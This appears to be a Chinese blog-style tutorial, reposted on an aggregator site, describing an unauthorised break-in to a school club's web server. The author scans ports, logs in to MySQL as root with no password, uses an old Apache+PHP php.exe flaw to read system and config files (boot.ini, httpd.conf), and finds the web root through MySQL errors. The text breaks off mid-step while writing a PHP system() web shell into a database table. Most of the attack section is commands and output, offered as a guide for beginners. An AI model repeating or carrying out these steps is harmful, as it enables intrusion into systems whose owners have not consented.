看紧你的3306端口 一次通过mysql的入侵

招职业模特

招职业模特

2016-01-29 16:36

看紧你的3306端口 一次通过mysql的入侵,看紧你的3306端口,一次通过mysql的入侵
 

用superscan扫了一下
某个c类的网段,寻找开放80端口的机器,结果就只有一台机器
开放了80端口,试着连了一下,是我们学校某个社团的的主页。
从端口的banner来看应该是apache(win32),证实一下
telnet 211.87.xxx.xxx
get(回车)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"
<HTML<HEAD
<TITLE501 Method
Not Implemented</TITLE
</HEAD<BODY
<H1Method Not Implemented</H1
get to /index
.html not supported.<P
Invalid method in request get<P
<HR
<ADDRESSApache/1.3.2
2 Server at www.xxxxxx.com Port 80</ADDRESS
</BODY</HTML 
 

 

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/sqlserver/)

遗失对主机的连接。
C:
呵呵,这下看得更清楚了

 

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/sqlserver/)

据我猜测,应该是"apache+mysql+php"的黄金组合吧
习惯性的mysql -h 211.87.xxx.xxx
果然连上了
Welcome to the MySQL monitor. Commands end with or g.
Your MySQL connection id is 17 to server version: 3.23.53-max-nt


Type help; or h for help. Type c to clear the buffer.

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/sqlserver/)


mysql


断开试着
mysql -h 211.87.xxx.xxx -u root -p
password:
Welcome to the MySQL monitor. Commands end with or g.
Your MySQL connection id is 18 to server version: 3.23.53-max-nt


Type help; or h for help. Type c to clear the buffer.

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/sqlserver/)


mysql
呵呵,大家看到了他的root用户没有密码,这是我今天要说的第一个主题。
这是相当的危险的,碰见这种情况,有99.999%的可能可以进入
既然使用的apache+php,只要找到他在本地存放的web的物理路径就为所欲为了
呵呵
下一个问题是我今天要说的重点怎么样才能知道那台主机的存放的web的物理路径?
方法有很多种,在这里我介绍2种方法供初学者参考
首先要告诉大家的是低版本的apache+php有一个漏洞
提http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名
就可以把那个物理文件下载下来。


于是提http://211.87.xxx.xxx/php/php.exe?c:a.txt
返回
No input file specified. (没有这个漏洞的话提示找不到网页)
好的,这说明他有这个漏洞。
在提http://211.87.xxx.xxx/php/php.exe?c:boot.ini
返回
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS [operating


systems] multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional"


/fastdetect
呵呵,装的还是xp。
好了,我们可以猜测对方apache的conf文件的物理位置了
http://211.87.xxx.xxx/php/php.exe?c:apacheconfhttpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?d:apacheconfhttpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?e:apacheconfhttpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?c:Program Filesapacheconfhttpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?f:apacheconfhttpd.conf
猜到了,返回了好多东西
找到我们想要的
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "D:homepage"
看得出来对方的主目录是D:homepage
下面的事就好办了,现在就想得到shell?
先别急,我们先来看看另一种方法
那就是利用mysql的错误
随便的浏览一下他的网页找到一处利用mysql的地方
http://211.87.xxx.xxx/skonline/study/list.php?id=14


长得太帅了,哈哈哈哈
提交
http://211.87.xxx.xxx/skonline/study/list.php?id=14
返回
Warning: Supplied argument is not a valid MySQL result resource in


d:homepageskonlinestudylist.php on line 231
呵呵,一览无余。
然后,然后就是制造我们的shell
mysql -h 211.87.xxx.xxx -u root -p
password:
Welcome to the MySQL monitor. Commands end with or g.
Your MySQL connection id is 18 to server version: 3.23.53-max-nt


Type help; or h for help. Type c to clear the buffer.

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/sqlserver/)


mysql use test;
Database changed
mysql create table t(cmd text);
Query OK, 0 rows affected (0.08 sec)


mysql insert into t values(<?system($c);?);
Query OK, 1 row aff

展开更多 50%)
分享

猜你喜欢

看紧你的3306端口 一次通过mysql的入侵

SQLServer
看紧你的3306端口 一次通过mysql的入侵

通过mysql入侵NT和win2000

MySQL mysql数据库
通过mysql入侵NT和win2000

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

刷一次变一次图的ASP代码

ASP
刷一次变一次图的ASP代码

一次旅行就像是一次心灵的净化

平面设计 海报设计 广告设计 画报设计 签名设计 服装设计 名片设计 画册设计 版式设计 商标设计
一次旅行就像是一次心灵的净化

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

AJAX教程(16):通过XMLHTTP进行一次指定的HEAD请求

Web开发
AJAX教程(16):通过XMLHTTP进行一次指定的HEAD请求

空调要多久清洗一次 多久清洗一次是合理的

空调 空调清洗 空调清洗时间
空调要多久清洗一次 多久清洗一次是合理的

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

SQL注入实战---利用“dbo”获得SQL管理权限和系统权限

SQL注入实战---利用“dbo”获得SQL管理权限和系统权限

《天天酷跑》WPE刷分攻略

《天天酷跑》WPE刷分攻略
下拉加载更多内容 ↓